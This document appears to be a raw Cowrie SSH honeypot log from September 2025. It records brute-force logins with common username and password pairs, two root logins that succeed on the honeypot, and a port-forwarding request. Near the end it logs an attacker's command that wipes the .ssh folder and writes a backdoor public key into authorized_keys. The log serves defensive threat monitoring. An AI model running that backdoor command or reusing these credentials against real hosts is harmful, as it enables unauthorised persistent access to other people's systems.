{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:05:42.796781Z","src_ip":"212.227.235.229","session":"e82803c644f4"}
{"eventid":"cowrie.login.failed","username":"linux","password":"linux","message":"login attempt [linux/linux] failed","sensor":"my-vps","timestamp":"2025-09-08T13:05:43.888747Z","src_ip":"212.227.235.229","session":"e82803c644f4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:05:44.011212Z","src_ip":"212.227.235.229","session":"5e34c5bd3340"}
{"eventid":"cowrie.session.closed","duration":180.22238516807556,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:05:44.014915Z","src_ip":"212.227.235.229","session":"5e34c5bd3340"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:05:45.154005Z","src_ip":"212.227.235.229","session":"e82803c644f4"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":48976,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c13d4a1e32f","protocol":"ssh","message":"New connection: 139.59.14.27:48976 (1.2.3.4:22) [session: 5c13d4a1e32f]","sensor":"my-vps","timestamp":"2025-09-08T13:06:02.544985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:06:02.545688Z","src_ip":"139.59.14.27","session":"5c13d4a1e32f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:06:02.907669Z","src_ip":"139.59.14.27","session":"5c13d4a1e32f"}
{"eventid":"cowrie.login.failed","username":"service","password":"changeme","message":"login attempt [service/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T13:06:04.409490Z","src_ip":"139.59.14.27","session":"5c13d4a1e32f"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":60826,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a4ca578435f","protocol":"ssh","message":"New connection: 134.199.174.250:60826 (1.2.3.4:22) [session: 1a4ca578435f]","sensor":"my-vps","timestamp":"2025-09-08T13:06:04.516464Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:06:04.517434Z","src_ip":"134.199.174.250","session":"1a4ca578435f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:06:04.816007Z","src_ip":"134.199.174.250","session":"1a4ca578435f"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:06:05.772111Z","src_ip":"139.59.14.27","session":"5c13d4a1e32f"}
{"eventid":"cowrie.login.failed","username":"user","password":"qwerty123","message":"login attempt [user/qwerty123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:06:05.795063Z","src_ip":"134.199.174.250","session":"1a4ca578435f"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:06:07.100162Z","src_ip":"134.199.174.250","session":"1a4ca578435f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27571,"dst_ip":"1.2.3.4","dst_port":22,"session":"557028276d03","protocol":"ssh","message":"New connection: 212.227.235.229:27571 (1.2.3.4:22) [session: 557028276d03]","sensor":"my-vps","timestamp":"2025-09-08T13:06:09.513265Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:06:09.514331Z","src_ip":"212.227.235.229","session":"557028276d03"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27861,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc06cf8488b1","protocol":"ssh","message":"New connection: 212.227.235.229:27861 (1.2.3.4:22) [session: dc06cf8488b1]","sensor":"my-vps","timestamp":"2025-09-08T13:06:09.644135Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:06:09.645223Z","src_ip":"212.227.235.229","session":"dc06cf8488b1"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T13:06:09.776750Z","src_ip":"212.227.235.229","session":"dc06cf8488b1"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:06:10.172799Z","src_ip":"212.227.235.229","session":"dc06cf8488b1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T13:06:10.305089Z","session":"dc06cf8488b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39752,"dst_ip":"1.2.3.4","dst_port":22,"session":"e759fbdf3af8","protocol":"ssh","message":"New connection: 212.227.235.229:39752 (1.2.3.4:22) [session: e759fbdf3af8]","sensor":"my-vps","timestamp":"2025-09-08T13:06:19.205089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:06:19.206475Z","src_ip":"212.227.235.229","session":"e759fbdf3af8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:06:19.337878Z","src_ip":"212.227.235.229","session":"e759fbdf3af8"}
{"eventid":"cowrie.login.failed","username":"gabriel","password":"gabriel123","message":"login attempt [gabriel/gabriel123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:06:19.866877Z","src_ip":"212.227.235.229","session":"e759fbdf3af8"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:06:21.002500Z","src_ip":"212.227.235.229","session":"e759fbdf3af8"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":50492,"dst_ip":"1.2.3.4","dst_port":22,"session":"127c24d9e10e","protocol":"ssh","message":"New connection: 134.199.174.250:50492 (1.2.3.4:22) [session: 127c24d9e10e]","sensor":"my-vps","timestamp":"2025-09-08T13:06:34.615832Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:06:34.616815Z","src_ip":"134.199.174.250","session":"127c24d9e10e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:06:34.907790Z","src_ip":"134.199.174.250","session":"127c24d9e10e"}
{"eventid":"cowrie.login.failed","username":"user","password":"1q2w3e4r","message":"login attempt [user/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-09-08T13:06:35.887994Z","src_ip":"134.199.174.250","session":"127c24d9e10e"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:06:37.194236Z","src_ip":"134.199.174.250","session":"127c24d9e10e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40170,"dst_ip":"1.2.3.4","dst_port":22,"session":"b71955766088","protocol":"ssh","message":"New connection: 212.227.235.229:40170 (1.2.3.4:22) [session: b71955766088]","sensor":"my-vps","timestamp":"2025-09-08T13:06:38.317023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:06:38.318434Z","src_ip":"212.227.235.229","session":"b71955766088"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:06:38.490939Z","src_ip":"212.227.235.229","session":"b71955766088"}
{"eventid":"cowrie.login.failed","username":"daniel","password":"changeme","message":"login attempt [daniel/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T13:06:39.222414Z","src_ip":"212.227.235.229","session":"b71955766088"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:06:40.397592Z","src_ip":"212.227.235.229","session":"b71955766088"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35322,"dst_ip":"1.2.3.4","dst_port":22,"session":"435d501d9451","protocol":"ssh","message":"New connection: 212.227.235.229:35322 (1.2.3.4:22) [session: 435d501d9451]","sensor":"my-vps","timestamp":"2025-09-08T13:07:01.669077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:07:01.670578Z","src_ip":"212.227.235.229","session":"435d501d9451"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:07:01.930635Z","src_ip":"212.227.235.229","session":"435d501d9451"}
{"eventid":"cowrie.login.success","username":"root","password":"123@Root","message":"login attempt [root/123@Root] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:07:03.012642Z","src_ip":"212.227.235.229","session":"435d501d9451"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:07:03.583741Z","src_ip":"212.227.235.229","session":"435d501d9451"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:07:03.584430Z","src_ip":"212.227.235.229","session":"435d501d9451"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:07:03.585578Z","src_ip":"212.227.235.229","session":"435d501d9451"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:07:03.846657Z","src_ip":"212.227.235.229","session":"435d501d9451"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":48738,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb413662b01c","protocol":"ssh","message":"New connection: 134.199.174.250:48738 (1.2.3.4:22) [session: fb413662b01c]","sensor":"my-vps","timestamp":"2025-09-08T13:07:04.128083Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:07:04.163413Z","src_ip":"134.199.174.250","session":"fb413662b01c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:07:04.391847Z","src_ip":"212.227.235.229","session":"435d501d9451"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:07:04.392519Z","src_ip":"212.227.235.229","session":"435d501d9451"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:07:04.394774Z","src_ip":"134.199.174.250","session":"fb413662b01c"}
